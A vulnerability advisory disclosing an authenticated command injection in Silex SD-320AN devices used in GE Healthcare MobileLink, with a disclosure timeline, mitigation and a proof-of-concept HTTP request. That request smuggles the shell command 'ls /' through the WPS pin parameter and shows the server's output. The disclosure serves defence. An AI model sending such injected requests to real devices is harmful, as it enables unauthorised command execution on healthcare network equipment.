Skip to content

Latest commit

 

History

History
82 lines (68 loc) · 2.49 KB

ATREDIS-2018-0002.md

File metadata and controls

82 lines (68 loc) · 2.49 KB

ATREDIS-2018-0002: Silex GEH-SD-320AN/SD-320AN Authenticated Command Injection

Vulnerability Type

OS Command Injection

Vendors

  • Silex Technology
  • GE Healthcare

Affected Products

  • Silex GEH-SD-320AN (GEH-1.10 20B7.07.21)
  • Silex SD-320AN (2.01)
  • GE Healthcare MobileLink

Summary

The Silex Technology GEH-SD-320AN and SD-320AN devices allow for remote command injection by authenticated users via the web interface. The GEH-SD- 320AN device is integrated into the GE Healthcare MobileLink System.

Mitigation

Silex Technology has provided an updated firmware image for the GE-SD-320AN and SD-320AN devices that addresses the command injection vulnerability.

Credit

This vulnerability was found by Eric Evenchick of Atredis Partners

References

Report Timeline

  • 2018-01-08: Atredis Partners reaches out to Silex Technology and GE Healthcare
  • 2018-01-23: Atredis Partners provides draft advisory to GE Healthcare Product Security
  • 2018-02-08: Silex Technology indicates that a fix is being developed for this issue
  • 2018-03-08: Atredis Partners receives pre-release firmware from Silex Technology and confirms that the issue is remediated based on the modified code
  • 2018-03-20: Atredis Partners provides draft advisory to CERT/CC
  • 2018-05-04: Atredis Partners plans to publish advisory ATREDIS-2018-0002

Technical Details

To set the WPS pin code, the ssi CGI application calls system using the WL_PINCODE_ENRO POST parameter as an argument. This parameter is not sanitized, allowing for command injection. The output of the injected command is provided in the response. Commands are executed as the www-data user. The request below uses this vulnerability to execute the command 'ls /':

POST /ssi/private/conf/aws_exec.html?page_url=index.htm&page_id=wless&page_sub=0&access=10dfba9807780980&language=1 HTTP/1.1
Host: device
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Connection: Close

WPS_METHOD_EXEC=pin&WPS_MODE_EXEC=wired&WL_PINCODE_ENRO=123;ls /;

The response from the server includes the output of the command:

HTTP/1.1 200 OK
Content-Length: 60
Connection: close
Date: Mon, 22 Jan 2018 16:45:03 GMT
Server: lighttpd/1.4.45-devel-59229e0

bin
dev
etc
home
lib
mnt
opt
proc
root
sbin
sys
tmp
usr
var